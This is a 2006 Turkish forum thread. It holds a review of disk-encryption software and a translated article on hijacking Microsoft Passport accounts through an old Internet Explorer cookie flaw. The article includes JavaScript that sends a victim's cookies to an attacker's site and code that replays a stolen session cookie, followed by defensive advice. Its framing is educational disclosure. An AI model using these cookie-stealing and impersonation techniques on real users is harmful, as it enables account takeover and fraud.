IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası
  sohbet

Etiketlenen Kullanıcılar

Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
Alt 19 Şubat 2006, 13:34   #1
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)
Hard Disk Kriptolama Çözümleri




Hard disk kriptolama çözümleri için Safeboot, Securedoc ve DriveCrypt programlarını inceledim. Programların kurumsal ve kişisel kullanıma yönelik sürümleri mevcut ve her programın birbirine karşı avantaj ve dezavantajları mevcut.
Önbilgi:
Hard disk kriptolama işlemi, belirtilen programlar aracılığıyla tüm diskin veya diskin bir kısmının kripto işlevine tabi tutulması sonucu gerçekleştirilmekte. Kriptolanan alana ulaşım oluşturulan anahtar(key) dosyası aracılığıyla gerçekleştirilir. Bu anahtarlar anahtar dosyası(key file) adı verilen dosya içinde saklanır. Anahtar dosyası normalde kriptolanmış biçimde tutulur. Bu kriptoyu çözebilmek için ya bir şifreye ya da e-token gibi harici cihazlarda oluşturulmuş anahtar dosyasına ihtiyaç vardır. Kullanıcı isterse, kriptolanmış alana ulaşmak için bilgisayarın açılışına ikinci bir güvenlik seçeneği koyabilir. Bu sistem, bilgisayarın boot sektörüne kriptolama programlarının kendi boot programlarını yerleştirmesini sağlar. Bu programlar hard diskin MBR kaydını modifiye ederek kullanıcıya hard disk'e ulaşım için anahtar dosyasınnı yerini ve şifresini sorar.Bu sisteme pre-boot adı verilir.
Kullanım Alanı:
Eğer aradığınız çözüm için bu programlardan birin kullanmayı düşünüyorsanız, nerede kullanacağınızı planlamanız gerekmektedir. Kurumsal çözümlerde Safeboot programı bu konuda lider konumda. Sunduğu kullanım ve yönetim kolaylıklarıyla Safeboot programı bu konuda lider konumda. Securedoc programının kurumsal kullanım için biraz daha gelişmesi gerekli.Kurulum ve kullanım sırasında her an başka bir sorunla karşılaşmanız olası. Kişisel kullanım için SecureDoc programını tavsiye ederim. DriveCrypt programı kurumsal kullanım için bir seçenek sunmamakta fakat kişisel kullanımda sunduğu değişik seçeneklerle SecureDoc'a alternatif olabilir. DriveCrypt programının tüm özelliklerini kullanmak istiyorsanız, standart sürümünün yanında PlusPack adı verilen ve ayrı bir lisansla satılan sürümü de almanız gerekli. Bundan sonra DriveCrypt Standart ve DriveCrypt PlusPack, tek bir program olarak DriveCrypt adıyla incelenecektir.

Program Karşılaştırmaları:
Her üç program da kriptolama özelliklerinin yanında pre-boot login özelliğini içermektedir. Programlardan SafeBoot ve SecureDoc(*) port kontrol adı verilen özelliğe sahiptir. Buna göre, kullanıcı isterse bilgisayarındaki seri, paralel ve usb portların kullanımını kapatabilir ve isteğe bağlı olarak şifreli kullanıma açabilir.DriveDecrypt programı tamamen kişisel kullanıma yönelik olduğu için böyle bir özellik içermemektedir. Bilgisayarların floppy disk sürücüleri aynı şekilde port kontrol işlevi gibi bloklanabilmektedir. Safeboot ve SecureDoc(Enterprise sürümü) bu özelliği içermektedir. DriveCrypt bu özelliğe sahip değildir.


Yazılım Adı ve Sürüm No SafeBoot v4.2.13 SecureDoc v3.9 DriveCrypt v4.2 Genel Özellikler Pre-Boot login, Windows login, disk encryption (Full, Partial), file encryption Pre-Boot login, Windows login, disk encryption (Full, Partial) Pre-boot login(**), Windows login, disk encryption (Full), file encryption Port Kontrol Var Var(*) Yok Floppy Disk Bloklama Var Var(*) Yok Merkezi Yönetim Var Var(*) Yok Pocket PDA vs. Desteği Var Var(*) Yok Active Directory Entegrasyon Var(Ek lisans gerektirmekte) Var (Ücretsiz araçlar aracılığıyla kullanıcı tarafından gerçekleştirilmeli) Yok E-Token kullanabilme Var Var Var Yeni e-tokenlara uyumluluk Var Var Var Kurtarma Konsolu Web Arabirimi, Yönetici Konsolu, Floppy Disk Web Arabirimi(*), Floppy Disk Floppy Disk(**) Remote Client Kontrolü Var Var(*) Yok Kullanım Kolaylığı Kolay Personel Edition – Kolay,
Enterprise Edition – Yönetim zorluğu Kolay Ekstra Özellikler ---- ---- Kullanıcıya özel Virtual Disk oluşturma, Wipe Disk Özelliği * Enterprise Edition sürümünde ** Plus Pack sürümünde
Kurumsal kullanıma yönelik olarak Safeboot ve SecureDoc Enterpise bütün kullanıcıların tek bir konsol altından yönetilmesini sağlar. Bu konsoldan yeni kullanıcı ekleme, kullanıcılara uzaktan istenilen programların yüklenilmesi ve şifre kurtarma işlevi gibi işlevler gerçekleştirilebilir. Kullanım kolaylığı konusunda Safeboot bu konuda gene lider konumda. SecureDoc Enterprise yönetim konsolunun bir miktar gelişme göstermesi gerekli. Bazı özelliklerin “Reserved For Future Use” altında gruplanması, sonraki sürümlerde kullanımı zor olan bu konsolun kullanıcı dostu olacağının göstergesi.
Programlar desktop PC özelliklerinin yanında, ayrıca PDA ve Palm türü cihaz kriptolamasını destekliyor. Safeboot programının Personel sürümü olmadığı için bu özelliklik standart birlikte gelmekte. SecureDoc programının enterprise editon sürümünde bu özellik mevcut. DriveCrypt programının sadece personel sürümü bulunduğu için bu özellik mevcut değil.
Birçok kurumsal işyerinde ActiveDirectory dizinleme hizmeti kullanılmaktadır. Programlar enterprise sürümlerine bu özelliği entegre etmeyi unutmamışlar. Fakat, Safeboot programını ActiveDirectory ile entegre etmek istenirse ek bir lisans satın almak gerekmekte. SecureDoc programı ise entegrasyon özelliğini ücretsiz sunmakta. Bunun için kullanım klavuzunda anlatılan bazı ücretsiz programları kullanıp, SecureDoc'a manuel olarak entegre etmek gerekmekte.
Her üç programda e-token kullanma desteğini içermekte. Programların desteklediği e-token'lar üretici firmaların web sitesinden öğrenilebilir. Ayrıca programlar desteklemediği e-token'lar için, dll dosyasını import ederek programa dahil etme özelliğini içermekte.

Son kullanıcı için, keyfile ister hard disk ister e-token üzerinde saklansın her zaman şifre unutma, e-token kaybetme gibi riskler mevcuttur. Bu yüzden her üç programda kurtarma konsolu seçeneğini içermekte. Programların sürüm türüne göre kurtarma konsolu seçenekleri değişmekte. Safeboot tamamen kurumsal bir yapıya hitap ettiği için, değişik kurtarma konsolları mevcuttur. Kullanıcı isterse yerel bir web sunucu üzerinden, isterse boot login ekranından, isterse yöneticiye ileteceği reverse hash key aracılığıyla şifresini geri alabilir. SecureDoc enterprise web arabirimi dışında bu özelliklere sahip. DriveCrypt programı bu konuda biraz yetersiz kalmış. Kurtarma olarak kullanıcı sadece floppy disk seçeneğini sunmakta.

Remote Client Control adı verilen sistemle, kullanıcılara Safeboot ve SecureDoc programı uzaktan yüklenebilir. Ayrıca yönetici, kullanıcı tarafında çalışmasını istediği programları, kullanıcı bilgisayarında ağ üzerinden gönderebilir. Bu özellik sadece kurumsal yapıda çalışmaktadır. Program yüklü olmayan kullanıcılara, hazırlanan bir floppy disk aracılığıyla client sürümü yüklenebilir.

Program incelemeleri sonrası Safeboot programının kurumsal bir yapı için hazırlanmış olmasına rağmen hem yönetici hem de kullanıcı tarafında büyük bir kolaylık mevcut olduğunu gördüm. SecureDoc programının, Enterprise sürümü için biraz daha gelişmesi lazım. Yetersiz bilgi ve kurulumdan sonra karşılaşılan sorunlar SecureDoc yöneticisini sıkıntıya sokabilir. SecureDoc Standard bu konuda yeterli bir yapıya sahip. Kullanımı kolay ve kullanım klavuzunda verilen bilgi yeterli. DriveCrypt programı kullanım kolaylığı yönünden başarılı bir profil çiziyor. Kullanıcıya sunduğu arabirim anlaşılır ve yardım dosyaları yeterli.

Anlatılanlar dışında DriveCrypt disk kriptolama özelliği dışında farklı bazı seçeneklerde sunmakta. Virtual Disk adı verilen ve istenirse hard disk'te istenirse harici medyada oluşturulabilen virtual disk normal disk altında ayrı bir kriptolanmış disk oluşturmakta. Kullanıcı istediği zaman şifreyi girerek bu bölümü aktif hale getirebilir, işini bittikten sonra bu alanı dismount edebilir. Eğer kullanıcı anahtar dosyası bir e-token üzerinde saklanıyorsa, kullanıcı e-token'ı taktığı sırada doğru şifre girilirse virtual drive aktif duruma geçiyor. Kullanıcı e-token'ı çıkarttığı anda virtual drive otomatik olarak dismount olmakta. DriveCrypt programı ayrıca wipe disk adı verilen bir özellik içermekte. Bu özelliği kullanırsanız, geri getirilmesi istemediğiniz sildiğiniz dosyaları wipe edebilirsiniz. Buna göre, silinen dosyanın üzerine DriveCrpyt tekrar tekrar yazmakta. Böylece silinen dosyanın geri getirilmesi imkansız hale gelmekte.

 
Alıntı ile Cevapla

IRCForumlari.NET Reklamlar
sohbet odaları sohbet odaları Benimmekan Mobil Sohbet
Alt 19 Şubat 2006, 13:37   #2
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)
Passport Hacking




Bu yazı Microsoft Passport`taki bir güvenlik açığını anlatıyor. Yazıda bir kullanıcının Passport hesabını ele geçirme hakkında detaylı bilgi ve örnek kodlar verilecektir.

Orjinali: Chris Shiflett

Fakat tüm bilgiler eğitim amaçlı kullanım içindir. Amaç web üzerindeki güvenliğin detaylı bir analizini yapmak ve bazı yanlış anlamaları ortaya çıkarmak. Şu anki Passport mekanızmasının kullanımında tavsiyelerim ve güvenliğini artırma yolları ile
yazımı bitireceğim.

Altyapı
Microsoft Passport kullanıcıların Internet üzerinde sunulan ve kayıt gerektiren servislere daha kolay erişimi için yaratılan bir mekanizmadır. Amaç kullanıcıların bir Passport için kayıt olmaları ve çeşitli sitelerdeki servisleri, her birinde kayıt olmaya
gerek duymadan (harcanan vakit ve şifrelerin bakımı her zaman sorun olmuşdur) kullanabilmeleridir.
Passport`un ek bir özelliği de Wallet`dır (cüzdan). Bir Wallet`e sahip olduğunuzda kredi kartı bilgilerini ve ek kişisel bilgileri depolayabilirsiniz. Bu katılımcı sitelerde satın alma işlemlerinde kullanılabilir.

Çerezler (Cookies)
Passport basitçe kullanıcının bilgisayarında depolanan cookie koleksiyonudur. Bu cookie`ler kullanıcıyı Passport kulanan bir siteye tanıtır. Passport mekanizmasında sunucudan sunucya haberleşme yoktur, tüm haberleşme kullanıcıya doğrudur.
Bu işlem için ayarlanan çeşitli cookie`ler aşağıdaki gibidir:

isim alanadı güvenli? dizin depolanma BrowserTest passport.com Hayır / hafıza MSPVis passport.com Hayır / disk MSPDom passport.com Hayır / disk MSPAuth passport.com Hayır / disk MSPProf passport.com Hayır / disk MSPSec passport.com Evet /ppsecure disk MSPRequ login.passport.com Hayır / hafıza PWSVis wallet.passport.com Evet / hafıza MSPAuth walletpassport.com Evet / hafıza
Microsoft Internet Explorer 5.5 öncesi sürümler istemci-tarafı scriptlerin o anki web sunucu ile paylaşılmaması gereken cookie`leri görüntüleyebilmesine izin veren bir cookie güvenlik açığı içeriyordu. Passport`un arkasındaki mekanizma tamamen
cookie`lere dayalı olduğu için bu kombinasyonun problemleri ortadadır.

Kriptolama (Encryption)
Bir zincir sadece en güçsüz bağlantısı kadar güçlüdür. Tanıdık geliyormu?
Birşeylerin kriptolanmış olması ile sahte bir güvenlik duygusuna kapılanların çokluğu sizi şaşırtabilir. Yukarıda bahsedilen cookie`lerin bazısı kriptolanmış değerlere sahiptir. Bu yazıda bu değerlerin dekriptolanması ile ilgili birşeye rastlamayacaksınız. Neden? Çünkü bunu yapmak zor ve kesinlikle gereksiz.
Kriptografi çok zevkli bir konu olsada bu yazının amacı Passport gibi bir mekanizmanın nasıl kolaylıkla kırılabileceği. Web sitemize veya web servisimize girmeye çalışan biri genellikle en kolay yolu seçecektir.

Bir kullanıcı Passport kullanan bir siteye girdiğinde sitenin kendisi dekriptolamayı gerçekleştirir. Gerçek kullanıcının sahip olduğu kriptolanmış cookie`lerin aynılarını sunarak o kullanıcının kimliğine bürünmek mümkündür. Birisinin cookie içerisindeki değerleri dekriptolamasındaki tek amaç Passport kullanılan bir site yaratmak olabilir.

HTTP
Detayları (pek çok web geliştirici tarafından dahi) gözardı edilsede yada bilinmesede Web`de gezinen çoğu insan HTTP hakkında bilgi sahibi olmuştur.
Microsoft Passport`u nasıl altettiğimi anlayabilmek için HTTP 1.1 ve onun cookie`leri nasıl kullandığı hakkında temel bir bilgi sahibi olmak gerekli. HTTP`nin bu yazıda bahsedilmeyecek olan pek çok detayı vardır. Tüm tanımlamalar için RFC 2616`ya
danışabilirsiniz.
Basit HTTP senaryosu bir istek ve cevaptan oluşan tek bir transferdir. Kullanıcı web`de gezinirken, Web browser (istemci) kullanıcının ziyaret ettiği sitelere çeşitli istekleri yapar. Web sunucuları da web sayfalarını işleyen browser`a cevaplar döner.
örnek istek:
GET / HTTP/1.1Host: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] Mozilla/5.0Accept: text/xml, image/png, image/jpeg, image/gif, */*Accept-Language: en-usAccept-Encoding: gzip, deflate, compress, identifyConnection: keep-alive
Bu örnek istek bir MOzilla browser ile [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] adresine yapılmıştır.
Başlıklar (Host, User-Agent, Accept, Accept-Language, Accept-Encoding, Connection) HTTP spesifikasyonunda izin verilen başlıklardan bazılarıdır. Her başlık sunucunun istemci tarafından yapılan isteğe cevap vermesine yardımcı olacak
bilgiler içerir.
örnek cevap:
HTTP/1.1 200 OKDate: Wed, 01 Aug 2001 22:00:00 GMTServer: Protoscope 0.0.1Connection: closeSet-Cookie: k2labs=chris; domain=.k2labs.org; Path=/;Content-Length: 38Content-Type: text/html<html><h1>Protoscope 0.0.1</h1></html>

 
Alıntı ile Cevapla

Alt 19 Şubat 2006, 13:38   #3
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



Örnek cevap web sunucu ve cevap tipi hakkında bazı bilgiler veriyor. Cevapta içerik ve başlıkların birbirinden 2 yeni satır ile ayrıldığını farketmişsinizdir. Bu HTTP`nin transfer davranışını açıklar. Başlangıç bağlantısı yapılıp istek gönderildiğinde cevap gelene kadar bağlantı (zaman aşımı durumu olmadıkça)
açıktır. Webde oturum yönetimini güvenli hale getirmenin zor olmasının sebeplerinden biri her transferin atomik olmasıdır. Örnek HTTP cevaptaki en önemli başlık Set-Cookie başlığı. Örnekte k2labs isminde ve chris değerine sahip bir cookie
yaratılıyor. Set-Cookie başlığındaki diğer tüm bilgiler browser`ın daha sonraki isteklerinin başlıklarında bu cookie`yi bulundurup bulundurmayacağını belirleyen bilgilerdir. Göreceğimiz gibi diğer hiçbir bilgi web sunucuya dönülmez, sadece isim ve değeri sağlanır. Örnekteki cookie, son kullanım değeri (expiration date)
belirlenmediği için diske yazılmayacak ve hafıza da duracaktır. Sadece k2labs.org alt-alanlarına (subdomain) yapılan isteklerde gönderilecek ve dizinde bir sınırlama yok. Yazılacak her cookie ayri Set-Cookie başlıkları ile geçirilir. Bu aşağıda gösterildiği gibi, birden fazla cookie`nin web sunucuya geri sunulması metodlarında çeşitlilik gösterir.
Bilmeniz gereken son bilgi de browser`ın bir istek yaparken web sunucuya daha önceden belirlenmiş cookie`yi nasıl göndereceğidir. Örnek Cookie başlığı:
Cookie: k2labs=chris
Farkedeceğiniz gibi cookie`nin değerinden başka hiçbir bilgi verilmiyor. Diğer tüm bilgiler daha önce bahsettiğim gibi sadece erişim gereksinimlerini belirlemek için.
Eğer birden fazla cookie sunuluyorsa her biri aynı şekilde (isim=değer) listelenir ve biribirinden noktalı virgül ile ayrılır (isim=değer;isim2=değer2). Bu sebeple sadece tek bir Cookie başlığı gönderilir.

Güvenlik Açığı
Microsoft Internet Explorer 5.5 öncesi sürümler cookie`lerde amaçlanan erişim gereksinimlerini tamamen aşan bir güvenlik açığı içeriyor. Etkilenen browser`ların geniş kullanımı (browserwatch.com`a göre yaklaşık olarak %67.6) sebebiyle bu önemli bir açık teşkil ediyor.
Özel yapılandırılmış bir URL ile, bir web sitesi etkilenen browser`a istemci-tarafında çalışan (client-side) script`ler yollayarak normalde okuyamayacağı cookie içeriklerini kendisine yollanmasını sağlayabilir. Bu güvenlik açığı
[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] adresinde anlatılmaktadır. Bu tip bir URL`ye örnek:
[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
/ ve ? işaretlerinin encode edilmiş değerlerini kullanarak [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] adresindeki bir sayfanın (etkilenen browser`a) .login.passport.com alanadı içerisindeymiş gibi ve /ppsecure dizini altında çalışıyor gibi gösterdik. URL aslında aşağıdaki gibi:
[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
Daha önce listelediğimiz Passport cookie`lerini hatırlayacak olursanız, bu bize .wallet.passport.com alanındaki ikisi (PWSVis ve PWSTok) hariç tüm cookie`lere erişim sağlıyor. Diğer ikisi de yukarıdaki örnekte 'login' yerine 'wallet' yazılarak görüntülenebilir.

Etkilenen browserlar bu URL`yi bozuk olarak algılamıyor. İstek doğru host`a gönderildi ([Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]). Bu tabi ki bizim erişim yapabilmemiz için gerekli.
Diğer bir nokta, browser Passport cookie`lerini içeren HTTP Cookie başlığını dönmeyecektir. Bu yüzden browser`dan Passport Cookie`lerini çıkartmakta bu başlığı kullanamayız ve alternatif bir metod geliştirmemiz gerekli. İşte burda istemci-tarafında çalışan script`ler devreye giriyor.

Client-Side Scripting
Örneklerimde istemci-tarafı scriptler için javascript kullanacağım. Aşağıdaki örnek script yukarıda bahsedilen reveal.php sayfası içerinde kullanılabilir.
Script .passport.com ve .login.passport.com alanlarındaki tüm cookie`leri ortaya çıkaracak ve bu bilgileri kullanıcının web sunucumuza göndermesi için bir URL bağlantısına ekleyecek. Document.cookie formatı isim=değer&isim2=değer2
şeklindedir ve bu bir URL`de istek değeri olarak aşağıdaki gibi kullanılabilir:
<script language='javascript'>document.write(`<a href='
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.
document.cookie + `'>Our Site has Moved</a>`);</script>

Hepsi bir arada
Şimdi bir Passport kullanıcısının cookie`si içerisindeki tüm verilere sahipiz. Bu veriler ele geçirildiğinde cookie`leri kullanacak diğer kişi için bir cookie`lerin alınacağı siteyi hazırlamalıyız. Bir web istemcisi ile taklit işlemi gerçekleştirilebilir
fakat bu gerekli bir adım değil. Cookie`leri yazmak için aynı güvenlik açığından ve istemci-tarafı script işleminden yararlanacağız. MSPSec cookie`sini javascript
(sunucu-tarafı script dili olarak PHP) kullanarak aşağıdaki örnekteki gibi yazabiliriz:
<script language='javascript'>this.document.cookie='MSPSec =<?echo $mspsec;?>; domain=.passport.com; path=/ppsecure;expires=Wed, 30-Dec-2037 08:00:00 GMT; secure;';</script>
Yazılım HTTP Set-Cookie başlığında olduğu gibi. Bu örnekteki gibi diğer Passport cookie`lerini de yaratabilirsiniz. 3 alan adının her biri için cookie`ler mevcut olduğunda başkasının kimliğine hiçbir kullanıcı ismi ve şifre girmeden sahip olunabilir. Buna kişisel bilgileri görüntüleme, değiştirme ve depolanmış kredi kartı
bilgileri ile alışveriş yapmak da dahil.

Özet
Bu işlemler kolay gibi görünse de başarılı olması için aşağıdaki şartların gerçekleşmesi gerekiyor:
1) Kullanıcı Passport`tan çıkmış olmalı (logout).
2) Taklit edici tamamen farklı bir IP adresine sahip olmalı.
3) Taklit edici farklı bir browser kullanıyor olmalı.
HTTP kullanarak %100 güvenli bir mekanizma yapmak çok zor çünkü HTTP Microsoft gibi üretici firmaların müşterilerine sağlamaya çalıştığı kolaylığı desteklemiyor. Passport`a login olurken 'Sign me in automatically on this computer'
seçeneğini asla işaretlemeyin. Bu çeşitli sitelerde tekrar şifrenizi girmeden otomatik olarak login olmanızı sağlayacak olan MSPSec cookie`sini yaratır. Bu cookie ele geçirildiğinde kullanıcı hesabınız için büyük tehlike yaratır.
Passport`a sadece gereksinim duyan sitelere girmeden önce login olun ve ziyaretiniz bittiğinde hemen logout yapın. Logout işlemi cookie`lerin çoğunu yok eder.
En önemlisi etkilenen browser sürümlerini kullanmamak. Eğer Microsoft Internet Explorer`ın etkilenen bir sürümünü kullanıyorsanız, ve kullanmaya devam etmek istiyorsanız Microsoft bu açık için bir yama çıkardı. Aşağıdaki adresten bu yamayı çekip kurun:
[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

Son Not
Passport mekanizmasında daha pek çok açık bulunacaktır. Bir başkasının kullanıcı hesabını ele geçirmek için Passport kullanılan bir site gibi görünmek belki en kolay yol. Çünkü Passport`un nasıl uygulandığı hakkında bir bilgi gerektirmiyor.
Umarım bu yazıda bahsedilen saldırı şu anki web teknolojisini ve web geliştiricilerin karşılaştığı problemleri daha iyi anlamanızı sağlamıştır.

 
Alıntı ile Cevapla

Cevapla

Etiketler
cozumleri, Çözümleri, disk, hard, kriptolama


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
Hard disk gibi CD Ocean Bilim Dünyasından Son Haberler 0 24 Ağustos 2011 02:14